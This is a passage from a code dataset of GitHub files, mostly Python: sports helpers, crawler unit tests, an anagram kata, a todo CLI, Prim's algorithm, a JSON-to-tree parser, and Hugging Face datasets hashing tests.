= 0\n# for score1, score2 in (lst):\n# if score1 > score2:\n# s1 += 1\n# elif score2 > score1:\n# s2 += 1\n# dct2 = {name1: s1, name2: s2}\n# for k, v in dct2.items():\n# if v == max(dct2.values()):\n# winner = k\n# print(f'The winner of the game is {winner} with final score {max(dct2.values())}:{min(dct2.values())}.')\n\n \n# winneris(scores, 'rafael', 'novak')\n\n","repo_name":"jamalsamatova/evening_bootcamp","sub_path":"week4/day18/higher_order_functions.py","file_name":"higher_order_functions.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26097080724","text":"from typing import List\nfrom player.index import PlayerGameSim, pos_dict\nfrom player.position import Position\n\ndef sort_team(players: List[PlayerGameSim], depth: int) -> List[PlayerGameSim]:\n sorted_list = []\n for i in range(1, 6):\n player_set = set(players) - set(sorted_list)\n sorted_list.append(get_best_at_position(i, player_set))\n \n for i in range(1, depth-4):\n player_set = set(players) - set(sorted_list)\n sorted_list.append(get_best_at_position(i, player_set))\n\n return sorted_list\n\ndef get_pos_depths(pos: Position, l: List[PlayerGameSim] = list()) -> int:\n if l == []:\n return 0\n depth = 0\n for player in l:\n if player._pos in pos_dict[pos.value]:\n depth += 1\n return depth\n\ndef get_best_at_position(i: int, pool: List, sub: bool = False) -> PlayerGameSim:\n if len(pool) == 0:\n return None\n \n # first filter out injured players\n pool = [p for p in pool if not p._injured]\n\n # sub = True (for subs) or False (for starters)\n if sub:\n pool = [p for p in pool if p.stat('bench_time') > 0]\n best = sorted(pool, key= lambda p: p.ovr(i), reverse=True)[0]\n if best.ovr(i) == -1:\n return None\n return best\n","repo_name":"okonma01/make-or-miss","sub_path":"team/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2308840378","text":"# -*- coding: utf-8 -*-\nfrom pathlib import Path\nimport pytest\nimport json\nimport os\nimport sys\nimport time\nimport shutil\n\n# Make sure the files in test parent directory are in path and can be imported\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nimport utils as u\nimport constants as c\n\n#######\n# TESTS\n#######\n\n\ndef test_get_root_url():\n \"\"\"Test that get_root_url returns the root url of a given url.\"\"\"\n assert u.get_root_url(\"https://www.schlieren.ch\") == \"https://www.schlieren.ch\"\n assert u.get_root_url(\"http://www.schlieren.ch\") == \"http://www.schlieren.ch\"\n assert u.get_root_url(\"https://www.schlieren.ch/\") == \"https://www.schlieren.ch\"\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness\")\n == \"https://www.schlieren.ch\"\n )\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness/\")\n == \"https://www.schlieren.ch\"\n )\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness/1086122\")\n == \"https://www.schlieren.ch\"\n )\n assert (\n u.get_root_url(\"https://realpython.com/pytest-python-testing/\")\n == \"https://realpython.com\"\n )\n assert (\n u.get_root_url(\"https://realpython.com/pytest-python-testing\")\n == \"https://realpython.com\"\n )\n\n\ndef test_get_id_from_url():\n \"\"\"Test that get_id_from_url returns the id from a given url.\"\"\"\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/politbusiness/1086122\") == \"1086122\"\n )\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/_rte/information/1111945\")\n == \"1111945\"\n )\n assert u.get_id_from_url(\"https://www.schlieren.ch/_doc/2894047\") == \"2894047\"\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/politbusiness/1086122/\")\n == \"1086122\"\n )\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/_rte/information/1111945/\")\n == \"1111945\"\n )\n assert u.get_id_from_url(\"https://www.schlieren.ch/_doc/2894047/\") == \"2894047\"\n\n\ndef test_read_json(item_dict):\n \"\"\"Test that read_json reads a json file from the given path.\"\"\"\n json_path = c.JSON_DIR / f\"{item_dict['item_id']}.json\"\n json_path.write_text(json.dumps(item_dict))\n assert u.read_json(json_path) == item_dict\n\n\ndef test_write_json(item_dict):\n \"\"\"Test that write_json writes a json file to the given path.\"\"\"\n json_path = c.JSON_DIR / f\"{item_dict['item_id']}.json\"\n u.write_json(item_dict, json_path)\n assert os.path.isfile(json_path)\n with open(json_path) as f:\n assert json.load(f) == item_dict\n\n\ndef test_load_ok_item_or_none(item_dict_raw):\n \"\"\"Test that load_ok_item_or_none returns the item_dict if the\n item status is OK and otherwise None.\"\"\"\n\n # non-existing item should return None\n assert u.load_ok_item_or_none(item_dict_raw) is None\n\n # existing item with status OK should return item_dict\n json_path = c.JSON_DIR / f\"{item_dict_raw['item_id']}.json\"\n item_dict_raw[\"status\"] = \"OK\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) == item_dict_raw\n\n # Existing item with status other than OK should return None:\n # Status ERROR should return None\n item_dict_raw[\"status\"] = \"ERROR\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n item_dict_raw[\"status\"] = \"SOMETHING_ELSE\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n # Empty string status should return None\n item_dict_raw[\"status\"] = \"\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n # None status should return None\n item_dict_raw[\"status\"] = None\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n\n\ndef test_with_retry():\n \"\"\"Test that with_retry decorator retries a function call a given number of times.\"\"\"\n\n def function_that_returns_value():\n nonlocal attempts\n attempts += 1\n return 42\n\n def function_that_raises_exception():\n nonlocal attempts\n attempts += 1\n raise Exception(\"Test exception\")\n\n def function_that_returns_value_on_second_attempt():\n nonlocal attempts\n attempts += 1\n if attempts == 1:\n raise Exception(\"Test exception\")\n return 42\n\n # A function that returns a value should return the value in first attempt\n attempts = 0\n f = u.with_retry(max_retries=3, retry_wait=0.1)(function_that_returns_value)\n assert f() == 42\n assert attempts == 1\n # A function that always raises exception should fail after (1 + max_retries) attempts\n attempts = 0\n time_start = time.time()\n f = u.with_retry(max_retries=3, retry_wait=0.05)(function_that_raises_exception)\n with pytest.raises(Exception, match=r\"Fetching failed after 3 retries .*\"):\n f()\n assert attempts == 4\n assert 0.1 < (time.time() - time_start) < 0.2\n # Similar to above, but different decorator args\n attempts = 0\n time_start = time.time()\n f = u.with_retry(max_retries=2, retry_wait=0.01)(function_that_raises_exception)\n with pytest.raises(Exception, match=r\"Fetching failed after 2 retries .*\"):\n f()\n assert attempts == 3\n assert 0.01 < (time.time() - time_start) < 0.03\n # A function that returns on second attempt, should return the value in second attempt\n attempts = 0\n time_start = time.time()\n f = u.with_retry(max_retries=5, retry_wait=0.05)(\n function_that_returns_value_on_second_attempt\n )\n assert f() == 42\n assert attempts == 2\n assert 0.01 < (time.time() - time_start) < 0.1\n\n\ndef test_fetch_items_from_table(monkeypatch, table_html, item_dict_raw):\n \"\"\"Test that fetch_items_from_table returns a list of items from a table html string.\"\"\"\n monkeypatch.setattr(\"utils.fetch_html\", lambda _: table_html)\n items_raw = u.fetch_items_from_table(\"https://www.schlieren.ch/politbusiness\")\n items_raw_filtered = [\n i for i in items_raw if i[\"item_id\"] == item_dict_raw[\"item_id\"]\n ]\n assert len(items_raw_filtered) == 1\n assert items_raw_filtered[0] == item_dict_raw\n\n\ndef test_read_pdf_text():\n \"\"\"Test that read_pdf_text returns the text from a well known test pdf file.\"\"\"\n test_pdf_path = (\n Path(os.path.dirname(os.path.abspath(__file__))) / \"test_assets\" / \"test.pdf\"\n )\n assert u.read_pdf_text(test_pdf_path) == \"hello there, beautiful\"\n\n\ndef test_clean_text():\n \"\"\"Test that clean_text returns a text with duplicate whitespaces, tab and newline removed.\"\"\"\n assert u.clean_text(\"Hello there, beautiful\") == \"Hello there, beautiful\"\n assert u.clean_text(\" Hello there, beautiful \") == \"Hello there, beautiful\"\n assert u.clean_text(\"Hello there, beautiful\\n\\r\") == \"Hello there, beautiful\"\n assert u.clean_text(\"Hello there, beautiful\\t\") == \"Hello there, beautiful\"\n assert (\n u.clean_text(\n \"\"\"\n Hello there,\n beautiful\n \"\"\"\n )\n == \"Hello there, beautiful\"\n )\n\n\ndef test_summarize_text(monkeypatch):\n \"\"\"Test that summarize_text returns a summary of a given text.\"\"\"\n # We do not want to call openai API, so mock chatgpt summary.\n monkeypatch.setattr(\"utils.generate_openai_summary\", lambda _: \"Awesome summary\")\n # When openai key is missing we expect an exception\n monkeypatch.setenv(\"OPENAI_KEY\", \"\")\n with pytest.raises(Exception, match=r\"Openai api key must be available .*\"):\n u.summarize_text(\"Dummy text\")\n # With openai key summary works\n monkeypatch.setenv(\"OPENAI_KEY\", \"Hemingway\")\n assert u.summarize_text(\"Dummy text\") == \"Awesome summary\"\n # Assume generate_openai_summary fails, make sure it is retried max_attempts times.\n # Monkeypatch also time.sleep function to not block tests for long time.\n monkeypatch.setattr(\"utils.generate_openai_summary\", lambda _: 1 / 0)\n monkeypatch.setattr(\"time.sleep\", lambda _: None)\n with pytest.raises(\n Exception, match=r\"Failed to summarize text after 4 attempts!.*\"\n ):\n u.summarize_text(\"Dummy text\", max_attempts=4)\n\n\ndef test_create_pdf_summary(monkeypatch, item_dict):\n \"\"\"\n Test that create_pdf_summary returns a summary of a given pdf file\n and that assertions work to avoid returning empty text and summary.\n \"\"\"\n # Monkeypatch: Instead of downloading the pdf, copy test pdf in temporary directory.\n def mock_download_and_write_pdf(*args, **kwargs):\n \"\"\"Just copy test.pdf to temp dir.\"\"\"\n test_pdf_path = (\n Path(os.path.dirname(os.path.abspath(__file__)))\n / \"test_assets\"\n / \"test.pdf\"\n )\n shutil.copy(test_pdf_path, c.TEMP_DIR / f\"{item_dict['pdf_id']}.pdf\")\n\n monkeypatch.setattr(\"utils.download_and_write_pdf\", mock_download_and_write_pdf)\n\n # Monkeypatch: Skip OCR calls in this test to speed up test.\n monkeypatch.setattr(\"os.system\", lambda _: None)\n\n pdf_url = item_dict[\"pdf_url\"]\n pdf_temp_path = c.TEMP_DIR / f\"{item_dict['pdf_id']}.pdf\"\n\n # When all goes well, we expect a summary (monkeypatched to be identical with test pdf content) and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.summarize_text\", lambda text: text)\n summary = u.create_pdf_summary(pdf_url)\n assert summary == \"hello there, beautiful\"\n assert os.path.isfile(pdf_temp_path) == False\n\n # When empty string is returned for summarization, we except an exception\n # to be raised with appropriate error message and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.summarize_text\", lambda _: \"\")\n with pytest.raises(Exception, match=r\".*PDF summary was empty!.*\"):\n u.create_pdf_summary(pdf_url)\n assert os.path.isfile(pdf_temp_path) == False\n\n # When empty string is returned for reading pdf, we except an exception\n # to be raised with appropriate error message and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.read_pdf_text\", lambda _: \"\")\n with pytest.raises(Exception, match=r\".*PDF text was empty!.*\"):\n u.create_pdf_summary(pdf_url)\n assert os.path.isfile(pdf_temp_path) == False\n\n\ndef test_process_item(monkeypatch, item_detail_page_html, item_dict_raw, item_dict):\n \"\"\"Test that process_item returns a processed item dict.\"\"\"\n monkeypatch.setattr(\"utils.fetch_html\", lambda _: item_detail_page_html)\n monkeypatch.setattr(\"utils.create_pdf_summary\", lambda _: \"Awesome summary\")\n\n item = u.process_item(item_dict_raw)\n assert item == item_dict\n\n\ndef test_add_response_links():\n items = [\n {\"item_id\": \"112358\", \"title\": \"Inquery about something\", \"related_items\": []},\n {\n \"item_id\": \"667430\",\n \"title\": \"Response to inquery about something\",\n \"related_items\": [],\n },\n {\n \"item_id\": \"602214\",\n \"title\": \"Totally different inquery\",\n \"related_items\": [],\n },\n ]\n u.add_response_links(items)\n # - We expect that the first item's title and id were added to second item's related_items array and vice versa.\n # - We expect that the third item's related_items array is empty.\n assert len(items[0][\"related_items\"]) == 1\n assert len(items[1][\"related_items\"]) == 1\n assert len(items[2][\"related_items\"]) == 0\n assert items[0][\"related_items\"][0] == {\n \"item_id\": items[1][\"item_id\"],\n \"title\": items[1][\"title\"],\n }\n assert items[1][\"related_items\"][0] == {\n \"item_id\": items[0][\"item_id\"],\n \"title\": items[0][\"title\"],\n }\n\n\ndef test_crawl_and_summarize(monkeypatch, item_dict_raw, item_dict):\n \"\"\"Test that crawl_and_summarize fetches items from the table and processes them.\"\"\"\n\n # If the item does NOT exist in the json dir, we expect it to be fetched and processed.\n monkeypatch.setattr(\"utils.fetch_items_from_table\", lambda _: [item_dict_raw])\n monkeypatch.setattr(\"utils.load_ok_item_or_none\", lambda _: None)\n monkeypatch.setattr(\"utils.process_item\", lambda _: item_dict)\n items = u.crawl_and_summarize(\"https://www.dummy_url_table.com\")\n assert len(items) == 1\n assert items[0] == item_dict\n\n # If the item DOES exist in the json dir, we expect it to be loaded and\n # process_item never being called. Test this by raising exception if process_item is called.\n monkeypatch.setattr(\"utils.load_ok_item_or_none\", lambda _: item_dict)\n monkeypatch.setattr(\"utils.process_item\", lambda _: 1 / 0)\n items = u.crawl_and_summarize(\"https://www.dummy_url_table.com\")\n assert len(items) == 1\n assert items[0] == item_dict\n","repo_name":"laiskasiili/crawl-n-summarize-parliament-schlieren","sub_path":"app/tests/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1505840451","text":"import sys\nimport itertools\n\ndef setupDictionary(filepath) :\n fileName = filepath\n file = open(fileName,\"r\")\n words = file.readlines()\n file.close()\n upperWords = list()\n for word in words :\n upperWords.append(word.lower().strip('\\n'))\n return upperWords\n\ndictionary = setupDictionary(\"words.txt\")\n#dictionary\n\ntotal_words = setupDictionary(\"unixWords.txt\")\n#total_words\n\na_set = set(total_words)\n#a_set\n\nfor word in dictionary:\n print(word)\n ang = []\n ang = [\"\".join(perm) for perm in itertools.permutations(word)]\n ang.remove(word)\n #print(ana)\n b_set = set(ang)\n #print(a_set)\n #print(b_set)\n if (a_set & b_set):\n anagrams = (a_set & b_set)\n print(anagrams)\n else:\n print(\"No anagram elements found in words text file.\")\n\n","repo_name":"Amey23/CodeKata","sub_path":"Kata06 Anagrams/kata06_anagrams.py","file_name":"kata06_anagrams.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37118613214","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt \n\n\n# zad 3.5 \ndef get_min_spanning_tree(G): # algorytm prima\n visited_nodes = [list(G)[0]]\n spanning_edges = []\n while len(visited_nodes) != G.number_of_nodes():\n\n u,v = -1,-1\n edge_weight = np.inf\n for node in visited_nodes:\n for neighbor in G.neighbors(node):\n if neighbor not in visited_nodes and G.get_edge_data(node,neighbor)['weight'] < edge_weight:\n u,v = node,neighbor\n edge_weight = G.get_edge_data(u,v)['weight']\n \n visited_nodes.append(v)\n spanning_edges.append((u,v,{'weight' :edge_weight}))\n\n return spanning_edges\n\ndef visualise_spanning_tree(G,spanning_tree):\n plt.figure(figsize=[10.6,7.2])\n\n plt.subplot(1,2,1)\n nx.draw_circular(G,with_labels=True)\n nx.draw_networkx_edge_labels(G,pos=nx.circular_layout(G),edge_labels=nx.get_edge_attributes(G,'weight'))\n\n G = nx.create_empty_copy(G)\n for edge in spanning_tree:\n G.add_edge(edge[0],edge[1])\n G[edge[0]][edge[1]]['weight'] = edge[2]['weight']\n\n plt.subplot(1,2,2) \n nx.draw_circular(G,with_labels=True)\n nx.draw_networkx_edge_labels(G,pos=nx.circular_layout(G),edge_labels=nx.get_edge_attributes(G,'weight'))\n\n\n\n\n\n# def prim_algorithm(graph):\n \n# mst_vertices = []\n# min_edge_weights = {}\n# parents = {}\n \n# for i in range(len(graph)):\n# min_edge_weights[i] = float('inf')\n# parents[i] = None\n \n# min_edge_weights[0] = 0\n \n# while len(mst_vertices) < len(graph):\n# min_weight_vertex = None\n# for i in range(len(graph)):\n# if i not in mst_vertices:\n# if min_weight_vertex is None or min_edge_weights[i] < min_edge_weights[min_weight_vertex]:\n# min_weight_vertex = i\n \n# mst_vertices.append(min_weight_vertex)\n \n# for i in range(len(graph)):\n# if graph[min_weight_vertex][i] != 0 and i not in mst_vertices:\n# if graph[min_weight_vertex][i] < min_edge_weights[i]:\n# min_edge_weights[i] = graph[min_weight_vertex][i]\n# parents[i] = min_weight_vertex\n \n\n# mst_edges = []\n# total_weight = 0\n \n# for i in range(1, len(graph)):\n# mst_edges.append((parents[i], i))\n# total_weight += graph[parents[i]][i]\n \n# return mst_edges, total_weight","repo_name":"albusDalbador/graph_theory_labs","sub_path":"lab3/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17911857268","text":"##ss\nclass Solution:\n def maxSubsequence(self, nums: List[int], k: int) -> List[int]:\n \n ##each element will either be considered or not considered\n ##basically find largest k elements and return ans\n ##can also used heap to make it asymptotically faster\n ans = []\n \n for x in range(len(nums)):\n if len(ans) < k:\n ans.append(nums[x])\n \n else:\n if min(ans) < nums[x]:\n ans.append(nums[x])\n ans.remove(min(ans))\n \n return ans\n \n","repo_name":"midnightbot/leetcode_solutions","sub_path":"python3_solution_set0/2099. Find Subsequence of Length K With the Largest Sum.py","file_name":"2099. Find Subsequence of Length K With the Largest Sum.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"99"} +{"seq_id":"43016110101","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# project = https://github.com/fanxs-t/Shadow-Border\n# author = Fanxs\n\n\nimport json\nfrom treelib import Tree, Node\n\n'''\n Designed for parse json string, especially for the case where there are jsons in a json body.\n Example:\n post_data = '{\"test\": \"123\", \"test1\": {\"test2\": \"456\"}}'\n ob = JsonParser(post_data)\n print(ob[\"test\"], ob[\"test1\"], ob[\"test2\"])\n ob2 = ob.copy()\n ob2[\"test2\"] = payload\n requests.request(\"POST\", \"https://www.baidu.com\", json = ob2.json)\n \n Only the data of leaf nodes are allowed for data modification, the \"test\" and \"test2\" in this case.\n - JsonParser(string).json returns parse dictionary (which can be used for making requests with 'requests')\n - JsonParser(string).args returns all arguments allowed for data manipulation.\n - JsonParser(string).copy to copy this object\n - JsonParser(string)[key] to get/modify the data in the parsed json\n'''\nclass JsonParser(object):\n def __init__(self, string):\n self.string = string\n self.is_json = False\n self.json = self._parse_json(string)\n self._args = {}\n self.tree = None\n if self.is_json:\n self.tree = self._dict_to_tree(self.json)\n self._get_leaves()\n else:\n self.json = None\n\n def keys(self):\n '''\n Return all keys of the parsed json.\n :return: json.keys()\n '''\n return self.json.keys() if self.is_json else []\n\n def args(self):\n '''\n Return the list of leaf nodes that are allowed for manipulation.\n :return: list\n '''\n return list(self._args.keys())\n\n def __getitem__(self, item):\n if item in self._args:\n identifier = self._args[item]\n return self.tree.nodes[identifier].data\n elif item in self.json:\n return self.json[item]\n else:\n raise KeyError\n\n def __setitem__(self, key, value):\n if key in self._args:\n identifier = self._args[key]\n self.tree.nodes[identifier].data = value\n self.json = self._tree_to_dict(self.tree)\n else:\n raise Exception(\"Cannot modify data of non-leaf nodes. You can only modify the data in the args()\")\n\n def copy(self):\n '''\n Deep copy the object\n :return: JsonParser\n '''\n return JsonParser(self.string)\n\n def _parse_json(self, s):\n '''\n Parse json string to dict. Designed for handling the case where there is json in a json.\n :param s: json string\n :return: dict\n '''\n try:\n jo = json.loads(s)\n if type(jo) is not dict:\n raise Exception\n except Exception:\n return s\n else:\n self.is_json = True\n for d in jo:\n jo[d] = self._parse_json(jo[d])\n return jo\n\n def _get_leaves(self):\n '''\n Get all leaf nodes which are allowed for data manipulation.\n :return: None\n '''\n self._args = {node.tag: node.identifier for node in self.tree.leaves()}\n return\n\n @staticmethod\n def _dict_to_tree(data):\n '''\n Parse dict to tree.\n :return: tree\n '''\n def _add_nodes(parent, name, identity, data):\n tree.create_node(name, identity, parent=parent, data=data)\n\n def _process(parent, data):\n nonlocal identity\n for i in data:\n if type(data[i]) is not dict:\n _add_nodes(parent, i, identity, data[i])\n identity += 1\n else:\n _add_nodes(parent, i, identity, \"\")\n parent_node = identity\n identity += 1\n _process(parent_node, data[i])\n\n tree = Tree()\n identity = 1\n tree.create_node('Root', 0)\n _process(0, data)\n return tree\n\n @staticmethod\n def _tree_to_dict(tree):\n '''\n Parse tree to dict.\n :param tree: A tree transformed from a dict.\n :return: dict\n '''\n\n def _get_dict(ptl, value):\n key = ptl[-1]\n if key == 0:\n k = list(value.keys())[0]\n v = list(value.values())[0]\n # combines several dicts together\n if k in result:\n new_value = dict(result[k], **v)\n result[k] = new_value\n else:\n result[k] = v\n return\n else:\n res = {tree.nodes[key].tag:value}\n return _get_dict(ptl[:-1], res)\n\n paths_to_leaves = tree.paths_to_leaves()\n result = {}\n for p in paths_to_leaves:\n num = p[-1]\n value = {tree.nodes[num].tag: tree.nodes[num].data}\n _get_dict(p[:-1], value)\n return result\n\nif __name__ == '__main__':\n import requests\n post_data = r'{\"app\":\"exp\", \"test\":{\"module\":123, \"something\":\"test\"}}'\n params = {'test':'test'}\n ob = JsonParser(post_data)\n print(ob.tree.show())\n '''\n print(ob[\"test\"], ob[\"test1\"], ob[\"test2\"])\n ob2 = ob.copy()\n ob2[\"test2\"] = \"aaaa\"\n requests.request(\"GET\", \"https://www.baidu.com\", params=params, json=ob2.json, proxies = {\"https\":\"http://127.0.0.1:8080\"}, verify=False)\n '''\n\n\n","repo_name":"fanxs-t/Shadow-Border","sub_path":"scanner/utils/parsejson.py","file_name":"parsejson.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"74232797126","text":"while True: \n user_action = input(\"Type add, show, or exit: \")\n user_action = user_action.strip()\n\n if 'add' in user_action:\n todo = user_action[4:]\n\n with open('todos.txt', 'r') as file: \n todos = file.readlines()\n\n todos.append(todo)\n\n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n\n elif 'show' in user_action:\n with open('todos.txt', 'w') as file: \n todos = file.readlines()\n \n for index, item in enumerate(todos): \n item = item.strip('\\n')\n row = f\"{index + 1}-{item}\"\n print(row)\n\n elif 'edit' in user_action:\n number = int(user_action[5:])\n number = number - 1\n\n with open('todos.txt', 'r') as file: \n todos = file.readlines()\n print('Here are the existing todos ', todos)\n\n new_todo = input(\"Enter a new todo: \")\n todos[number] = new_todo + '\\n'\n \n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n elif 'complete' in user_action:\n number = int(user_action[9:])\n\n with open('todos.txt', 'r') as file: \n todos = file.readlines()\n index = number - 1\n todos_to_remove = todos[index].strip('\\n')\n todos.pop(number - 1)\n\n with open('todos.txt', 'w') as file: \n file.writelines(todos)\n \n message = f\"Todo {todos_to_remove} was removed from the list\"\n elif 'exit' in user_action: \n break\n else: \n print(\"Command is not valid\")\n\nprint(\"Bye\")","repo_name":"DWAcademProgramming/funInPython","sub_path":"todo/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39470127866","text":"import json\nimport pickle\nimport subprocess\nfrom hashlib import md5\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom types import CodeType, FunctionType\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport pytest\nfrom multiprocess import Pool\n\nimport datasets\nfrom datasets.fingerprint import Hasher, fingerprint_transform\nfrom datasets.table import InMemoryTable\n\nfrom .utils import require_regex, require_transformers\n\n\nclass Foo:\n def __init__(self, foo):\n self.foo = foo\n\n def __call__(self):\n return self.foo\n\n\nclass DatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False)\n def func1(self, new_fingerprint, *args, **kwargs):\n return DatasetChild(self.data, fingerprint=new_fingerprint)\n\n @fingerprint_transform(inplace=False)\n def func2(self, new_fingerprint, *args, **kwargs):\n return DatasetChild(self.data, fingerprint=new_fingerprint)\n\n\nclass UnpicklableCallable:\n def __init__(self, callable):\n self.callable = callable\n\n def __call__(self, *args, **kwargs):\n if self.callable is not None:\n return self.callable(*args, **kwargs)\n\n def __getstate__(self):\n raise pickle.PicklingError()\n\n\nclass TokenizersDumpTest(TestCase):\n @require_transformers\n @pytest.mark.integration\n def test_hash_tokenizer(self):\n from transformers import AutoTokenizer\n\n def encode(x):\n return tokenizer(x)\n\n # TODO: add hash consistency tests across sessions\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n hash1 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash1_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash1_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n hash2 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash2_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash2_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n hash3 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n hash3_lambda = md5(datasets.utils.py_utils.dumps(lambda x: tokenizer(x))).hexdigest()\n hash3_encode = md5(datasets.utils.py_utils.dumps(encode)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n self.assertEqual(hash1_lambda, hash3_lambda)\n self.assertNotEqual(hash1_lambda, hash2_lambda)\n self.assertEqual(hash1_encode, hash3_encode)\n self.assertNotEqual(hash1_encode, hash2_encode)\n\n @require_transformers\n @pytest.mark.integration\n def test_hash_tokenizer_with_cache(self):\n from transformers import AutoTokenizer\n\n tokenizer = AutoTokenizer.from_pretrained(\"gpt2\")\n hash1 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n tokenizer(\"Hello world !\") # call once to change the tokenizer's cache\n hash2 = md5(datasets.utils.py_utils.dumps(tokenizer)).hexdigest()\n self.assertEqual(hash1, hash2)\n\n @require_regex\n def test_hash_regex(self):\n import regex\n\n pat = regex.Regex(\"foo\")\n hash1 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n pat = regex.Regex(\"bar\")\n hash2 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n pat = regex.Regex(\"foo\")\n hash3 = md5(datasets.utils.py_utils.dumps(pat)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n\nclass RecurseDumpTest(TestCase):\n def test_recurse_dump_for_function(self):\n def func():\n return foo\n\n foo = [0]\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n foo = [1]\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n foo = [0]\n hash3 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_dump_ignores_line_definition_of_function(self):\n def func():\n pass\n\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n\n def func():\n pass\n\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertEqual(hash1, hash2)\n\n def test_recurse_dump_for_class(self):\n\n hash1 = md5(datasets.utils.py_utils.dumps(Foo([0]))).hexdigest()\n hash2 = md5(datasets.utils.py_utils.dumps(Foo([1]))).hexdigest()\n hash3 = md5(datasets.utils.py_utils.dumps(Foo([0]))).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_recurse_dump_for_method(self):\n\n hash1 = md5(datasets.utils.py_utils.dumps(Foo([0]).__call__)).hexdigest()\n hash2 = md5(datasets.utils.py_utils.dumps(Foo([1]).__call__)).hexdigest()\n hash3 = md5(datasets.utils.py_utils.dumps(Foo([0]).__call__)).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_dump_ipython_function(self):\n\n code_args = (\n \"co_argcount\",\n \"co_kwonlyargcount\",\n \"co_nlocals\",\n \"co_stacksize\",\n \"co_flags\",\n \"co_code\",\n \"co_consts\",\n \"co_names\",\n \"co_varnames\",\n \"co_filename\",\n \"co_name\",\n \"co_firstlineno\",\n \"co_lnotab\",\n \"co_freevars\",\n \"co_cellvars\",\n )\n\n def _create_code(*args):\n \"\"\"Create CodeType for any python 3 version. From dill._dill._create_code\"\"\"\n if hasattr(args[-3], \"encode\"):\n args = list(args)\n args[-3] = args[-3].encode() # co_lnotab\n args[-10] = args[-10].encode() # co_code\n if hasattr(CodeType, \"co_posonlyargcount\"):\n if len(args) == 16:\n return CodeType(*args)\n elif len(args) == 15:\n return CodeType(args[0], 0, *args[1:])\n return CodeType(args[0], 0, 0, *args[1:])\n elif hasattr(CodeType, \"co_kwonlyargcount\"):\n if len(args) == 16:\n return CodeType(args[0], *args[2:])\n elif len(args) == 15:\n return CodeType(*args)\n return CodeType(args[0], 0, *args[1:])\n if len(args) == 16:\n return CodeType(args[0], *args[3:])\n elif len(args) == 15:\n return CodeType(args[0], *args[2:])\n return CodeType(*args)\n\n def create_ipython_func(co_filename, returned_obj):\n def func():\n return returned_obj\n\n code = func.__code__\n # Use _create_code from dill in order to make it work for different python versions\n code = 